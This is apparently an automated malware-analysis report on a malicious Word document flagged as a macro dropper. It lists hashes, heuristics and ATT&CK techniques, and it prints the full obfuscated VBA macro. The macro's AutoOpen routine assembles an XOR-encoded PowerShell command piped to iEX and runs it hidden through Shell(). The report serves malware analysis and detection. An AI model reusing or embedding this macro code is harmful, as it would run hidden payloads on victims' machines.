Office (OLE) malware analysis — malicious · 443d117a11e76544

MALICIOUS

Office (OLE)

218.8 KB Created: 2018-06-25 13:22:00 Authoring application: Microsoft Office Word First seen: 2018-07-08

MD5: 845de7ad2a43d86649b497fa3229f764 SHA-1: 4e312d56785371ba308689afb72524a98f9f82fa SHA-256: 443d117a11e76544db2d2535fe0f2e725818c0240cf3ec956fc6771e6608b14d

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicated by the OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics, suggesting it's designed to execute arbitrary code. This is further supported by the ClamAV detection as a dropper. The macro's obfuscated nature and the presence of a Shell() call strongly indicate its purpose is to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6590804-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6590804-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

nrpEq = (37024 / CBool(74173) + 34580 + CSng(RZCcv) * (59678 - NLSjk + 52835 - CLng(FjFVi)))
JiZjv = jwzEcSpXq + zBdzCkwQuwi + Shell(MQwuMALr + ZYLQwQK + fUOhNwzKGpJ, (14842 / 14842) - 1)
TNwwa = CByte(11511 * Tan(41626) / 95667 + CLng(zjXBu * 52165 * 1846 * Chr(57691)))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub AutoOpen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12302 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12302 bytes
SHA-256: `cef9abd8de61c14cfbd41ffce843e75b7682bc1c8810bd62cf66ebc88317fd6f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DIEAPULFSRub" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NZluVZOMJic" Function VmrcQjX() On Error Resume Next oVFFjj = CByte(11688 * Tan(93762) / 84103 + CLng(JmpVjN * 12585 * 26003 * Chr(21484))) afppMM = (44650 / CBool(55344) + 69084 + CSng(oiBHoS) * (69284 - ruoGR + 78360 - CLng(Kpkia))) rMFjlJwBwh = "Hell" + " [stR" + "iNG]" + "::jOIn" + Chr(40) + " '' ," + Chr(40) + "'52" + "}90U67" + "F102c4" + "5@126%11" + "7q103E6" + "1F127" + "@11" TfFkY = CByte(90790 * Tan(72781) / 35603 + CLng(RvVoLd * 61728 * 41582 * Chr(37692))) ZDzKTO = (1960 / CBool(77139) + 2870 + CSng(mwJJA) * (24818 - CHldLz + 37113 - CLng(TbTVzj))) AZYBu = "4E12" + "2q" + "11" + "7U1" + "15S100c4" + "8}94%" vzBfiR = CByte(87494 * Tan(26370) / 83841 + CLng(tPlfzz * 83301 * 67414 * Chr(49087))) EFZRO = (8194 / CBool(58314) + 60255 + CSng(mhSDm) * (29390 - iDPoAQ + 79197 - CLng(LQdiT))) NkCuAW = "117E" + "10" + "0q62@71S" + "117E11" + "4V83V12" + "4}12" + "1V1" + "17U" + "126U" + "100@43}5" EoqTqW = CByte(28625 * Tan(82018) / 1426 + CLng(ItGuE * 52563 * 78913 * Chr(25793))) zcGfRo = (32012 / CBool(37872) + 10497 + CSng(azLKqk) * (32884 - HzlQM + 66228 - CLng(kiJIMY))) DjtoqXn = "2F" + "93F" + "123" + "F88F45" + "c55" + "S120F" + "100S100" + "q96}" + "42F63" + "V63c100V" + "101%98" + "F114F12" UuiFT = CByte(56432 * Tan(89615) / 15396 + CLng(Smijt * 27311 * 30062 * Chr(38899))) TbbtiQ = (46333 / CBool(69991) + 62259 + CSng(HLsZf) * (90118 - TXtuJ + 32771 - CLng(MIScAj))) flikP = "7S114@1" + "01}" + "121%1" + "15@12" + "3c99c6" + "2%" + "126V" + "117%100" + "F63c105V" + "71F81S" + "102%93V" + "12" swBBwv = CByte(5311 * Tan(51325) / 82889 + CLng(JwNhFW * 4562 * 66118 * Chr(51190))) zhHRTn = (19548 / CBool(19866) + 58589 + CSng(azvjAG) * (75290 - NTLRc + 22096 - CLng(aIakD))) rKWVPGYi = "1@" + "63" + "%80q120c" + "100c100" + "U96F42F6" + "3U" + "63q11" + "8V11" + "7U113@10" + "0}101S9" + "8q117%" + "99q115" sJzAq = CByte(96241 * Tan(73987) / 37274 + CLng(zFhLLi * 46571 * 56786 * Chr(99288))) zBAOh = (8979 / CBool(92988) + 94129 + CSng(fjaajh) * (98894 - iBKkqW + 47562 - CLng(SPdPD))) knDOcdWwQJ = "E120@" + "121%126" + "V113E62%" + "115}127" + "F125" + "q63U84%" + "99@84E" + "68" + "S63V80U" uliJb = CByte(73325 * Tan(21160) / 87950 + CLng(tLWaEF * 62941 * 46331 * Chr(83504))) cThPV = (13517 / CBool(59662) + 52963 + CSng(PpShp) * (49762 - QdirBI + 29628 - CLng(LiJLN))) PjLdi = "120F1" + "00F1" + "00S96V" + "42S" + "63U6" + "3@123q1" VmrcQjX = rMFjlJwBwh + AZYBu + NkCuAW + DjtoqXn + flikP + rKWVPGYi + knDOcdWwQJ + PjLdi fGRZs = CByte(3632 * Tan(98611) / 83305 + CLng(EHhkp * 70276 * 91601 * Chr(84696))) USvuIE = (38601 / CBool(8044) + 50848 + CSng(rwTOs) * (39837 - oYOnj + 44436 - CLng(pfihL))) End Function Function nAOuBcziUnQ() On Error Resume Next QtnWzb = CByte(99407 * Tan(73804) / 13022 + CLng(bEGFls * 60076 * 40280 * Chr(78713))) ijBsz = (55711 / CBool(95950) + 77135 + CSng(tFdZmt) * (47679 - kjuVq + 41225 - CLng(STHFv))) uObWCH = "21@" + "126%120" + "c125@1" + "13" + "@100" + "%119@" + "12" + "1S113@" + "127" + "%62c1" + "15" + "q127" mQjQQi = CByte(79429 * Tan(70597) / 13641 + CLng(JLaSj * 23374 * 87017 * Chr(54455))) RzPzm = (85045 / CBool(27108) + 80909 + CSng(jVssNd) * (22781 - CnRZmd + 84299 - CLng(RjQZZ))) SqZVGju = "@125" + "@63V7" + "3V4" + "0S104F9" + "8F" + "88}63" + "E80c120" + "V100@100" + "}96V42q" + "63" + "@63F10" + "3@103" pnzXL = CByte(8292 * Tan(87160) / 94786 + CLng(vHJPwP * 87584 * 21980 * Chr(66576))) CchXmi = (41968 / CBool(44910) + 60329 + CSng(IwQAr) * (68462 - IzMhAS + 61443 - CLng(PaDZi))) PlWtCmcv = "}1" + "03S62q98" + "E127%11" + "4q12" + "1c126" + "E98@117" + "q10" + "5S126%" + "127F12" + "4U11" + "6E9" + "9}124E" VPUpaB = CByte(88900 * Tan(45273) / 14142 + CLng(BCZah * 55244 * 16802 * Chr(25851))) IDvQsB = (20077 / CBool(3765) + 37883 + CSng(ESwwP) * (36520 - Qcjfh + 21417 - CLng(RarCh))) wFBnU = "113%" + "103}62" + "@11" + "5F1" + "27E1" + "25q" RdBCjs = CByte(62119 * Tan(35255) / 72941 + CLng(IKYpM * 86703 * 65849 * Chr(89073))) fFdiC = (7522 / CBool(50909) + 85760 + CSng(zSKIUf) * (2417 - zIVOYm + 16877 - CLng(icIli))) fsuEs = "63E84V8" + "4q10" + "3q96" + "q74c" + "115" + "c70@6" + "3%80V" + "120@100" uNMmJR = CByte(73323 * Tan(30733) / 93001 + CLng(XDuKh * 2477 * 9596 * Chr(26134))) sfArl = (12236 / CBool(35062) + 39707 + CSng(XaSHFK) * (1062 - GRvIIf + 43368 - CLng(FOOTt))) dclsV = "S10" + "0}9" + "6%42" + "}63%" + "63E103c1" + "03" + "@10" + "3V6" + "2q122@10" fNwdP = CByte(92467 * Tan(4979) / 17947 + CLng(QjENWU * 16729 * 59004 * Chr(56946))) jmQwQj = (99712 / CBool(57130) + 41319 + CSng(rDBjlj) * (8136 - TBjuqV + 59435 - CLng(FkLoEJ))) cYUYkZM = "1F113" + "@124c1" + "23U101%" + "11" + "5c121" + "E126" + "q119S" + "61%96q" nAOuBcziUnQ = uObWCH + SqZVGju + PlWtCmcv + wFBnU + fsuEs + dclsV + cYUYkZM jKwXoZ = CByte(53480 * Tan(4774) / 65453 + CLng(QYuVjG * 41979 * 19879 * Chr(1690))) lLFlw = (91951 / CBool(37354) + 60086 + CSng(PShciC) * (42273 - nCozQ + 85221 - CLng(dGQROl))) End Function Function kVVkXhlRKo() On Error Resume Next NmGEV = CByte(83748 * Tan(4972) / 40915 + CLng(UMCuz * 59876 * 13037 * Chr(69970))) VcpGVT = (19236 / CBool(15014) + 79819 + CSng(BRtnlW) * (58310 - OwukU + 85343 - CLng(swZuAu))) iSrjwTQSf = "11" + "7U9" + "8S99F1" + "21V1" + "13U6" + "2E1" + "15S12" + "7c125" + "}63S34" + "%40S" rpiXj = CByte(21158 * Tan(16641) / 67157 + CLng(wYTZz * 60485 * 12885 * Chr(45267))) cKwEE = (71378 / CBool(15124) + 93539 + CSng(cVkNp) * (69925 - EGhjBm + 16004 - CLng(jaXRzi))) LwzLWFjCU = "127}" + "113" + "U125S12" + "1}82@6" + "3%5" + "5S62E67" + "@96@124" + "S121S" + "10" + "0c5" BTAzwn = CByte(77543 * Tan(34109) / 72384 + CLng(hhHkF * 14614 * 12441 * Chr(50358))) zvYZD = (21337 / CBool(80362) + 5018 + CSng(XdNqw) * (79514 - dufRA + 68315 - CLng(XLjcTi))) fwqUhhBh = "6c5" + "5E80F" + "55@" + "57E4" + "3q5" + "2c87U12" + "2q102c4" + "8}45F4" + "8@55}3" EdCpY = CByte(44247 * Tan(31849) / 84644 + CLng(hhnmDR * 77627 * 21820 * Chr(25266))) KVkbFS = (31471 / CBool(107) + 3060 + CSng(UiWUK) * (42927 - NrACb + 23520 - CLng(IkTcK))) CjAatbSpqzq = "4F" + "34S" + "40V55U43" + "S52E86q9" + "7E83F45" + "}52" + "S117" + "U126V102" + "S42S" + "100q117" + "U125U96E" + "59U55V7" YGfvX = CByte(19692 * Tan(27143) / 55215 + CLng(oNoYZ * 65701 * 87283 * Chr(95593))) OuuPZc = (67653 / CBool(18613) + 53426 + CSng(Vwopj) * (18169 - jjwnFS + 36677 - CLng(SOoIr))) zRJESMH = "6U55%59c" + "52}" + "87U122F" + "102%59c5" + "5E62S117" + "V10" + "4c117F5" + "5%43V" ZRlNQL = CByte(89425 * Tan(78773) / 41956 + CLng(vjJVAu * 22943 * 8607 * Chr(49231))) uaIiR = (17915 / CBool(17107) + 54436 + CSng(EGNuBk) * (98556 - sJtLzc + 6895 - CLng(HaQtu))) Ccwkw = "11" + "8%12" + "7c98U117" + "c11" + "3V1" + "15%1" + "20S56V" TRmpN = CByte(87390 * Tan(35506) / 36035 + CLng(jimvM * 4296 * 62528 * Chr(78322))) pkDrvw = (8642 / CBool(20704) + 19188 + CSng(rijchw) * (18618 - TnCDnG + 31770 - CLng(ThTMO))) PBuiWinbC = "52" + "S92E" + "87c" + "92%48@" + "121q1" + "26c48}52" + "}93%123}" + "88E57" + "S1" NmsPc = CByte(80849 * Tan(53063) / 64874 + CLng(BsPSno * 70129 * 85507 * Chr(65270))) kYkma = (72230 / CBool(93826) + 94480 + CSng(fiWrzU) * (60391 - PprjQ + 40733 - CLng(jSYAL))) obAAhPrc = "07V1" + "00S9" + "8q" + "105}1" + "07E52V90" + "F67V102F" + "62F8" + "4c127S" + "103" + "c126" kVVkXhlRKo = iSrjwTQSf + LwzLWFjCU + fwqUhhBh + CjAatbSpqzq + zRJESMH + Ccwkw + PBuiWinbC + obAAhPrc qiwGa = CByte(93100 * Tan(92506) / 90396 + CLng(mrbjo * 92984 * 58865 * Chr(90945))) Pzmqw = (39696 / CBool(38997) + 5984 + CSng(GIMwlX) * (33732 - ibUiDh + 46693 - CLng(zTziMv))) End Function Function jnqPwYQfh() On Error Resume Next oCMQp = CByte(17328 * Tan(56901) / 90880 + CLng(pMuwtl * 34326 * 38523 * Chr(32761))) wGQNn = (22707 / CBool(31755) + 27967 + CSng(zBWVX) * (20308 - VNpQqv + 65211 - CLng(MrMFpA))) FnYVvi = "F124" + "@12" + "7S11" + "3q116" + "q86" + "%121%" + "12" aZsooh = CByte(39038 * Tan(98434) / 46067 + CLng(OQYczk * 59456 * 75270 * Chr(86944))) Sipif = (2668 / CBool(47206) + 69643 + CSng(vzKZB) * (88913 - TIHVZ + 85081 - CLng(EaiAj))) ZwoQac = "4@" + "117V5" + "6F52c92" + "}87" + "c92q60q" + "48%52%" + "86S9" + "7F83E5" rHiGIQ = CByte(60890 * Tan(86322) / 25216 + CLng(DOUjN * 52260 * 53015 * Chr(5195))) jRJMv = (52777 / CBool(50774) + 31731 + CSng(DAApza) * (41702 - WkTZN + 92000 - CLng(sEAPST))) ldCjOEPZG = "7F4" + "3}67F" + "100" + "S1" + "13c98" + "E100S61" + "c6" + "4S98F12" + "7}115U" + "117V99" + "F99U48" + "U52" YMoqno = CByte(65183 * Tan(99982) / 74329 + CLng(iLCmwF * 95337 * 23086 * Chr(43735))) dICZiT = (42535 / CBool(65132) + 38271 + CSng(aKzQIJ) * (87542 - rREbd + 45397 - CLng(Wzbui))) pCmfVMb = "%86U" + "97F83F" + "43E" + "114c98%1" + "17c1" + "13" + "S123}43" + "}1" + "09E11" PYKNo = CByte(52618 * Tan(30014) / 76885 + CLng(JUrSs * 91858 * 43782 * Chr(78896))) QklZC = (59284 / CBool(59273) + 24848 + CSng(UunoN) * (3935 - JaUVLK + 8699 - CLng(WPblQQ))) KoYNta = "5c113@" + "100@115" + "F120c107" + "}10" + "9q10" + "9'.sPLiT" + Chr(40) + "'%q" tmBSTi = CByte(46978 * Tan(43195) / 3693 + CLng(IUMBF * 31605 * 46609 * Chr(98585))) wwWrBI = (10638 / CBool(61301) + 13074 + CSng(mDtws) * (36258 - PizNWt + 74533 - CLng(LqTmm))) jiIbMGYZUG = "F@EcU}" + "VS' " + Chr(41) + " \|" + " foRe" + "acH-oB" + "jeCT{[" + "char] " + Chr(40) + "$" + "_ -bxO" + "r '0" + "x10" + "'" + Chr(41) + " } " UmYtA = CByte(94641 * Tan(59158) / 81974 + CLng(utjjV * 28815 * 106 * Chr(69186))) NjspWb = (5952 / CBool(69393) + 60154 + CSng(SmtUct) * (32493 - iYoGsc + 84619 - CLng(CjlGu))) vpkuCkFPVqP = Chr(41) + " " + Chr(41) + "\|iEX" + "" jnqPwYQfh = FnYVvi + ZwoQac + ldCjOEPZG + pCmfVMb + KoYNta + jiIbMGYZUG + vpkuCkFPVqP CzcSWY = CByte(87573 * Tan(52887) / 32440 + CLng(kzNRu * 91642 * 39827 * Chr(71228))) oYtaL = (14701 / CBool(77039) + 30534 + CSng(RZWwYv) * (99246 - GwjsT + 25503 - CLng(ItMMsW))) End Function Attribute VB_Name = "XHAKiETCAO" Function TNIBLouI() On Error Resume Next NUHEh = CByte(14698 * Tan(54325) / 27658 + CLng(dBHzt * 18615 * 8731 * Chr(55810))) izbNj = (57439 / CBool(3250) + 12489 + CSng(WOlLfk) * (10500 - dntrjX + 6487 - CLng(CPzwar))) MpjbZZwnG = woPsi + Chr(zYvsYOot + 80 + tsQXJ) + "ow" + "ers" UJarb = CByte(14378 * Tan(80523) / 12240 + CLng(IszAHT * 67328 * 55013 * Chr(78623))) AAcFiB = (52990 / CBool(47268) + 28224 + CSng(NEKSiK) * (47246 - XfXTBZ + 64694 - CLng(fPDFt))) wnPkai = CByte(43831 * Tan(90231) / 85587 + CLng(YjYkRo * 68134 * 29030 * Chr(96177))) SjzOh = (97573 / CBool(5636) + 46116 + CSng(WLUJj) * (4753 - AsnjRB + 33462 - CLng(PaCYZ))) TNIBLouI = bQMiADT + MpjbZZwnG + VmrcQjX + nAOuBcziUnQ + kVVkXhlRKo + jnqPwYQfh naBaFw = CByte(17918 * Tan(63060) / 17411 + CLng(bvlwu * 71782 * 2298 * Chr(20313))) TqpFD = (33769 / CBool(29580) + 90829 + CSng(HwdwXZ) * (46621 - ZJXNF + 99386 - CLng(Khchka))) End Function Function LJcOkRkD(ZYLQwQK) On Error Resume Next wbWrs = CByte(62287 * Tan(64509) / 1463 + CLng(NOEOKT * 63602 * 33172 * Chr(43536))) iKFaKN = (82968 / CBool(88918) + 90665 + CSng(piKYQ) * (17344 - wwUZw + 85250 - CLng(IlKOw))) jbUnuL = CByte(47321 * Tan(13952) / 43816 + CLng(YFOcjR * 20161 * 73003 * Chr(15921))) nrpEq = (37024 / CBool(74173) + 34580 + CSng(RZCcv) * (59678 - NLSjk + 52835 - CLng(FjFVi))) JiZjv = jwzEcSpXq + zBdzCkwQuwi + Shell(MQwuMALr + ZYLQwQK + fUOhNwzKGpJ, (14842 / 14842) - 1) TNwwa = CByte(11511 * Tan(41626) / 95667 + CLng(zjXBu * 52165 * 1846 * Chr(57691))) lGVwpk = (22846 / CBool(79346) + 68699 + CSng(lzEkZ) * (81129 - PikGS + 82633 - CLng(ubVzTn))) End Function Sub AutoOpen() On Error Resume Next Tarwaa = CByte(56732 * Tan(30590) / 80795 + CLng(iKQRi * 92409 * 74603 * Chr(25456))) sMvDX = (55216 / CBool(35580) + 29374 + CSng(EOOMWw) * (93382 - jFnzk + 68064 - CLng(YlXup))) LJcOkRkD (TNIBLouI) JTkHbi = CByte(3411 * Tan(86448) / 33699 + CLng(zkDQGk * 20361 * 60922 * Chr(89096))) EdrvqD = (16757 / CBool(56266) + 57218 + CSng(mFXZFl) * (78087 - PvVTB + 87844 - CLng(JoUSic))) End Sub

SHA-256: cef9abd8de61c14cfbd41ffce843e75b7682bc1c8810bd62cf66ebc88317fd6f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DIEAPULFSRub"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NZluVZOMJic"
Function VmrcQjX()
On Error Resume Next
oVFFjj = CByte(11688 * Tan(93762) / 84103 + CLng(JmpVjN * 12585 * 26003 * Chr(21484)))
afppMM = (44650 / CBool(55344) + 69084 + CSng(oiBHoS) * (69284 - ruoGR + 78360 - CLng(Kpkia)))
rMFjlJwBwh = "Hell" + "  [stR" + "iNG]" + "::jOIn" + Chr(40) + " '' ," + Chr(40) + "'52" + "}90U67" + "F102c4" + "5@126%11" + "7q103E6" + "1F127" + "@11"
TfFkY = CByte(90790 * Tan(72781) / 35603 + CLng(RvVoLd * 61728 * 41582 * Chr(37692)))
ZDzKTO = (1960 / CBool(77139) + 2870 + CSng(mwJJA) * (24818 - CHldLz + 37113 - CLng(TbTVzj)))
AZYBu = "4E12" + "2q" + "11" + "7U1" + "15S100c4" + "8}94%"
vzBfiR = CByte(87494 * Tan(26370) / 83841 + CLng(tPlfzz * 83301 * 67414 * Chr(49087)))
EFZRO = (8194 / CBool(58314) + 60255 + CSng(mhSDm) * (29390 - iDPoAQ + 79197 - CLng(LQdiT)))
NkCuAW = "117E" + "10" + "0q62@71S" + "117E11" + "4V83V12" + "4}12" + "1V1" + "17U" + "126U" + "100@43}5"
EoqTqW = CByte(28625 * Tan(82018) / 1426 + CLng(ItGuE * 52563 * 78913 * Chr(25793)))
zcGfRo = (32012 / CBool(37872) + 10497 + CSng(azLKqk) * (32884 - HzlQM + 66228 - CLng(kiJIMY)))
DjtoqXn = "2F" + "93F" + "123" + "F88F45" + "c55" + "S120F" + "100S100" + "q96}" + "42F63" + "V63c100V" + "101%98" + "F114F12"
UuiFT = CByte(56432 * Tan(89615) / 15396 + CLng(Smijt * 27311 * 30062 * Chr(38899)))
TbbtiQ = (46333 / CBool(69991) + 62259 + CSng(HLsZf) * (90118 - TXtuJ + 32771 - CLng(MIScAj)))
flikP = "7S114@1" + "01}" + "121%1" + "15@12" + "3c99c6" + "2%" + "126V" + "117%100" + "F63c105V" + "71F81S" + "102%93V" + "12"
swBBwv = CByte(5311 * Tan(51325) / 82889 + CLng(JwNhFW * 4562 * 66118 * Chr(51190)))
zhHRTn = (19548 / CBool(19866) + 58589 + CSng(azvjAG) * (75290 - NTLRc + 22096 - CLng(aIakD)))
rKWVPGYi = "1@" + "63" + "%80q120c" + "100c100" + "U96F42F6" + "3U" + "63q11" + "8V11" + "7U113@10" + "0}101S9" + "8q117%" + "99q115"
sJzAq = CByte(96241 * Tan(73987) / 37274 + CLng(zFhLLi * 46571 * 56786 * Chr(99288)))
zBAOh = (8979 / CBool(92988) + 94129 + CSng(fjaajh) * (98894 - iBKkqW + 47562 - CLng(SPdPD)))
knDOcdWwQJ = "E120@" + "121%126" + "V113E62%" + "115}127" + "F125" + "q63U84%" + "99@84E" + "68" + "S63V80U"
uliJb = CByte(73325 * Tan(21160) / 87950 + CLng(tLWaEF * 62941 * 46331 * Chr(83504)))
cThPV = (13517 / CBool(59662) + 52963 + CSng(PpShp) * (49762 - QdirBI + 29628 - CLng(LiJLN)))
PjLdi = "120F1" + "00F1" + "00S96V" + "42S" + "63U6" + "3@123q1"
VmrcQjX = rMFjlJwBwh + AZYBu + NkCuAW + DjtoqXn + flikP + rKWVPGYi + knDOcdWwQJ + PjLdi
fGRZs = CByte(3632 * Tan(98611) / 83305 + CLng(EHhkp * 70276 * 91601 * Chr(84696)))
USvuIE = (38601 / CBool(8044) + 50848 + CSng(rwTOs) * (39837 - oYOnj + 44436 - CLng(pfihL)))
End Function
Function nAOuBcziUnQ()
On Error Resume Next
QtnWzb = CByte(99407 * Tan(73804) / 13022 + CLng(bEGFls * 60076 * 40280 * Chr(78713)))
ijBsz = (55711 / CBool(95950) + 77135 + CSng(tFdZmt) * (47679 - kjuVq + 41225 - CLng(STHFv)))
uObWCH = "21@" + "126%120" + "c125@1" + "13" + "@100" + "%119@" + "12" + "1S113@" + "127" + "%62c1" + "15" + "q127"
mQjQQi = CByte(79429 * Tan(70597) / 13641 + CLng(JLaSj * 23374 * 87017 * Chr(54455)))
RzPzm = (85045 / CBool(27108) + 80909 + CSng(jVssNd) * (22781 - CnRZmd + 84299 - CLng(RjQZZ)))
SqZVGju = "@125" + "@63V7" + "3V4" + "0S104F9" + "8F" + "88}63" + "E80c120" + "V100@100" + "}96V42q" + "63" + "@63F10" + "3@103"
pnzXL = CByte(8292 * Tan(87160) / 94786 + CLng(vHJPwP * 87584 * 21980 * Chr(66576)))
CchXmi = (41968 / CBool(44910) + 60329 + CSng(IwQAr) * (68462 - IzMhAS + 61443 - CLng(PaDZi)))
PlWtCmcv = "}1" + "03S62q98" + "E127%11" + "4q12" + "1c126" + "E98@117" + "q10" + "5S126%" + "127F12" + "4U11" + "6E9" + "9}124E"
VPUpaB = CByte(88900 * Tan(45273) / 14142 + CLng(BCZah * 55244 * 16802 * Chr(25851)))
IDvQsB = (20077 / CBool(3765) + 37883 + CSng(ESwwP) * (36520 - Qcjfh + 21417 - CLng(RarCh)))
wFBnU = "113%" + "103}62" + "@11" + "5F1" + "27E1" + "25q"
RdBCjs = CByte(62119 * Tan(35255) / 72941 + CLng(IKYpM * 86703 * 65849 * Chr(89073)))
fFdiC = (7522 / CBool(50909) + 85760 + CSng(zSKIUf) * (2417 - zIVOYm + 16877 - CLng(icIli)))
fsuEs = "63E84V8" + "4q10" + "3q96" + "q74c" + "115" + "c70@6" + "3%80V" + "120@100"
uNMmJR = CByte(73323 * Tan(30733) / 93001 + CLng(XDuKh * 2477 * 9596 * Chr(26134)))
sfArl = (12236 / CBool(35062) + 39707 + CSng(XaSHFK) * (1062 - GRvIIf + 43368 - CLng(FOOTt)))
dclsV = "S10" + "0}9" + "6%42" + "}63%" + "63E103c1" + "03" + "@10" + "3V6" + "2q122@10"
fNwdP = CByte(92467 * Tan(4979) / 17947 + CLng(QjENWU * 16729 * 59004 * Chr(56946)))
jmQwQj = (99712 / CBool(57130) + 41319 + CSng(rDBjlj) * (8136 - TBjuqV + 59435 - CLng(FkLoEJ)))
cYUYkZM = "1F113" + "@124c1" + "23U101%" + "11" + "5c121" + "E126" + "q119S" + "61%96q"
nAOuBcziUnQ = uObWCH + SqZVGju + PlWtCmcv + wFBnU + fsuEs + dclsV + cYUYkZM
jKwXoZ = CByte(53480 * Tan(4774) / 65453 + CLng(QYuVjG * 41979 * 19879 * Chr(1690)))
lLFlw = (91951 / CBool(37354) + 60086 + CSng(PShciC) * (42273 - nCozQ + 85221 - CLng(dGQROl)))
End Function
Function kVVkXhlRKo()
On Error Resume Next
NmGEV = CByte(83748 * Tan(4972) / 40915 + CLng(UMCuz * 59876 * 13037 * Chr(69970)))
VcpGVT = (19236 / CBool(15014) + 79819 + CSng(BRtnlW) * (58310 - OwukU + 85343 - CLng(swZuAu)))
iSrjwTQSf = "11" + "7U9" + "8S99F1" + "21V1" + "13U6" + "2E1" + "15S12" + "7c125" + "}63S34" + "%40S"
rpiXj = CByte(21158 * Tan(16641) / 67157 + CLng(wYTZz * 60485 * 12885 * Chr(45267)))
cKwEE = (71378 / CBool(15124) + 93539 + CSng(cVkNp) * (69925 - EGhjBm + 16004 - CLng(jaXRzi)))
LwzLWFjCU = "127}" + "113" + "U125S12" + "1}82@6" + "3%5" + "5S62E67" + "@96@124" + "S121S" + "10" + "0c5"
BTAzwn = CByte(77543 * Tan(34109) / 72384 + CLng(hhHkF * 14614 * 12441 * Chr(50358)))
zvYZD = (21337 / CBool(80362) + 5018 + CSng(XdNqw) * (79514 - dufRA + 68315 - CLng(XLjcTi)))
fwqUhhBh = "6c5" + "5E80F" + "55@" + "57E4" + "3q5" + "2c87U12" + "2q102c4" + "8}45F4" + "8@55}3"
EdCpY = CByte(44247 * Tan(31849) / 84644 + CLng(hhnmDR * 77627 * 21820 * Chr(25266)))
KVkbFS = (31471 / CBool(107) + 3060 + CSng(UiWUK) * (42927 - NrACb + 23520 - CLng(IkTcK)))
CjAatbSpqzq = "4F" + "34S" + "40V55U43" + "S52E86q9" + "7E83F45" + "}52" + "S117" + "U126V102" + "S42S" + "100q117" + "U125U96E" + "59U55V7"
YGfvX = CByte(19692 * Tan(27143) / 55215 + CLng(oNoYZ * 65701 * 87283 * Chr(95593)))
OuuPZc = (67653 / CBool(18613) + 53426 + CSng(Vwopj) * (18169 - jjwnFS + 36677 - CLng(SOoIr)))
zRJESMH = "6U55%59c" + "52}" + "87U122F" + "102%59c5" + "5E62S117" + "V10" + "4c117F5" + "5%43V"
ZRlNQL = CByte(89425 * Tan(78773) / 41956 + CLng(vjJVAu * 22943 * 8607 * Chr(49231)))
uaIiR = (17915 / CBool(17107) + 54436 + CSng(EGNuBk) * (98556 - sJtLzc + 6895 - CLng(HaQtu)))
Ccwkw = "11" + "8%12" + "7c98U117" + "c11" + "3V1" + "15%1" + "20S56V"
TRmpN = CByte(87390 * Tan(35506) / 36035 + CLng(jimvM * 4296 * 62528 * Chr(78322)))
pkDrvw = (8642 / CBool(20704) + 19188 + CSng(rijchw) * (18618 - TnCDnG + 31770 - CLng(ThTMO)))
PBuiWinbC = "52" + "S92E" + "87c" + "92%48@" + "121q1" + "26c48}52" + "}93%123}" + "88E57" + "S1"
NmsPc = CByte(80849 * Tan(53063) / 64874 + CLng(BsPSno * 70129 * 85507 * Chr(65270)))
kYkma = (72230 / CBool(93826) + 94480 + CSng(fiWrzU) * (60391 - PprjQ + 40733 - CLng(jSYAL)))
obAAhPrc = "07V1" + "00S9" + "8q" + "105}1" + "07E52V90" + "F67V102F" + "62F8" + "4c127S" + "103" + "c126"
kVVkXhlRKo = iSrjwTQSf + LwzLWFjCU + fwqUhhBh + CjAatbSpqzq + zRJESMH + Ccwkw + PBuiWinbC + obAAhPrc
qiwGa = CByte(93100 * Tan(92506) / 90396 + CLng(mrbjo * 92984 * 58865 * Chr(90945)))
Pzmqw = (39696 / CBool(38997) + 5984 + CSng(GIMwlX) * (33732 - ibUiDh + 46693 - CLng(zTziMv)))
End Function
Function jnqPwYQfh()
On Error Resume Next
oCMQp = CByte(17328 * Tan(56901) / 90880 + CLng(pMuwtl * 34326 * 38523 * Chr(32761)))
wGQNn = (22707 / CBool(31755) + 27967 + CSng(zBWVX) * (20308 - VNpQqv + 65211 - CLng(MrMFpA)))
FnYVvi = "F124" + "@12" + "7S11" + "3q116" + "q86" + "%121%" + "12"
aZsooh = CByte(39038 * Tan(98434) / 46067 + CLng(OQYczk * 59456 * 75270 * Chr(86944)))
Sipif = (2668 / CBool(47206) + 69643 + CSng(vzKZB) * (88913 - TIHVZ + 85081 - CLng(EaiAj)))
ZwoQac = "4@" + "117V5" + "6F52c92" + "}87" + "c92q60q" + "48%52%" + "86S9" + "7F83E5"
